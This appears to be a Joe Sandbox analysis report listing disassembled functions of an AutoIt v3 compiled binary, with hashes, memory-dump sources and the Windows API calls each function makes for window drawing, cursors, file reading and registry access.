                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                • DeleteObject.GDI32(?), ref: 00459551
                                                                                                • DestroyWindow.USER32(?), ref: 00459563
                                                                                                • GetDesktopWindow.USER32 ref: 00459581
                                                                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                • _wcslen.LIBCMT ref: 00459916
                                                                                                • _wcscpy.LIBCMT ref: 0045993A
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                • GetDC.USER32(00000000), ref: 004599FC
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                • API String ID: 4040870279-2373415609
                                                                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                • String ID:
                                                                                                • API String ID: 69173610-0
                                                                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                • API String ID: 2910397461-517079104
                                                                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                • API String ID: 1038674560-3360698832
                                                                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                • SetCursor.USER32(00000000), ref: 00430773
                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                • SetCursor.USER32(00000000), ref: 00430803
                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                • SetCursor.USER32(00000000), ref: 00430833
                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                • SetCursor.USER32(00000000), ref: 00430863
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                • SetCursor.USER32(00000000), ref: 00430887
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$Load
                                                                                                • String ID:
                                                                                                • API String ID: 1675784387-0
                                                                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                • String ID:
                                                                                                • API String ID: 1582027408-0
                                                                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                • API String ID: 3217815495-966354055
                                                                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
